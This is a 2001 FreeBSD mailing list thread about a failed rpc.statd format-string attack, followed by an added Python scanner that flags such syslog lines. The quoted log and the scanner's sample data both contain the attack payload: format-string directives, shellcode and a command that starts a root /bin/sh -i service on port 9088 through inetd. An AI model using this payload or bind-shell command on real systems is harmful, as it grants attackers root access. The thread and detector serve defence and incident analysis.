Date: Thu, 4 Jan 2001 10:48:23 -0500
From: "Raymond Hicks" <rayhicks@UU.NET>
To: "'Guy Helmer'" <ghelmer@palisadesys.com>, <Eric_Stanfield@kenokozie.com>
Cc: <freebsd-questions@FreeBSD.ORG>
Subject: RE: hack attempt (again) - help
Message-ID: <003801c07665$c5b4d170$d7902799@sysenglt112>
In-Reply-To: <Pine.LNX.4.21.0101040919451.10523-100000@magellan.palisadesys.com>
why don't you just run a sniffer?

-----Original Message-----
From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Guy Helmer
Sent: Thursday, January 04, 2001 10:26 AM
To: Eric_Stanfield@kenokozie.com
Cc: freebsd-questions@FreeBSD.ORG
Subject: Re: hack attempt (again) - help

On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:

> Alright this jerkoff has once again attempted to hack one of my freebsd
> machines by trying what I assume is a buffer overflow to rpc:
>
> Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PëK^M-
>
> v¬M-^Cî M-^M^(M-^CÆ M- ^°M-^Cî M-^M^.M-^CÆ M-^Cà M-^Cë#M- ^´1ÀM-^Cî
> M-^HF'M-^HF*M-^CÆ M-^HF«M- F¸°+, M- óM-^MN¬M-^MV¸ÍM-^@1ÛM-
> Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>
> /tmp/m; /usr/sbin/inetd /tmp/m;
>
> The interesting bit is what he (she?) is attempting to sneak in at the end
> of the garbage sent to the port.
>
> I've given the system a thorough check and this seems to have been a second
> failed attempt. I'm now annoyed, however, and would like to be able to at
> least log what address this stuff is originating from. Can anyone suggest
> something from the ports that would do the trick? I've disabled nfs/rpc
> but I'm sure the hacker will come knocking again.

snort with a current copy of the rule set from
http://www.whitehats.com/ids/index.html ought to detect this (and lots of
other script kiddie attempts).

Guy

--
Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com
http://www.palisadesys.com/~ghelmer

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
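The question in the quoted message is how to notice this kind of rpc.statd probe without watching the console. As an added example that is not part of the thread (my own code, not anything from the FreeBSD list, from snort, or from the whitehats rule set), the following Python scanner flags syslog lines carrying the indicators visible in Eric's log line: a `%n` write directive, a run of `%08x`-style reads, the `M-^P` rendering of 0x90 NOP bytes, and a trailing `/bin/sh` or `inetd` invocation. The sample log lines are constructed for the demo. Note that the syslog line itself carries no peer address, which is exactly why the replies point at a sniffer or snort; this scanner only tells a defender when to go and look at the capture.

```python
import re
from dataclasses import dataclass

# Constructed sample syslog lines (not taken from the thread). The second line
# mimics the shape of the rpc.statd "Invalid hostname to sm_mon" message:
# format-string directives, an M-^P (0x90) sled, and a trailing shell command.
SAMPLE_LOG = """\
Jan  3 23:18:01 mrtg sshd[412]: Accepted publickey for admin from 10.0.0.5
Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: %08x %08x %08x %0242x%n%055x%n M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P /bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;
Jan  3 23:20:10 mrtg rpc.statd: Invalid hostname to sm_mon: host.example.net
"""

# Classic BSD syslog layout: "Mon dd HH:MM:SS host prog[pid]: message".
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# Heuristic indicators with a short reason each. These are not snort signatures;
# they are the tells a reader of the quoted log line would look for.
INDICATORS = [
    ("format-string write directive (%n)", re.compile(r"%n")),
    ("run of format-string read directives", re.compile(r"(%0?\d*x\s*){4,}")),
    ("NOP sled (0x90 shown as M-^P)", re.compile(r"(M-\^P){4,}")),
    ("shell invocation", re.compile(r"/bin/sh")),
    ("inetd service staging", re.compile(r"inetd")),
]


@dataclass
class Finding:
    ts: str
    host: str
    prog: str
    reasons: list


def analyze_line(line):
    """Return a Finding for a suspicious syslog line, or None."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    msg = m.group("msg")
    reasons = [name for name, rx in INDICATORS if rx.search(msg)]
    if not reasons:
        return None
    return Finding(m.group("ts"), m.group("host"), m.group("prog").strip(), reasons)


def scan(text):
    """Scan a block of syslog text and return all findings."""
    return [f for f in map(analyze_line, text.splitlines()) if f]


def statd_probes(text):
    """Only the findings raised by rpc.statd, the daemon named in the thread."""
    return [f for f in scan(text) if f.prog == "rpc.statd"]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.prog}: {', '.join(f.reasons)}")
```

Run it against `/var/log/messages` by reading the file into `scan()`; a hit on `rpc.statd` with several reasons at once is the moment to pull the corresponding window out of the sniffer or snort capture to get the source address the syslog line lacks.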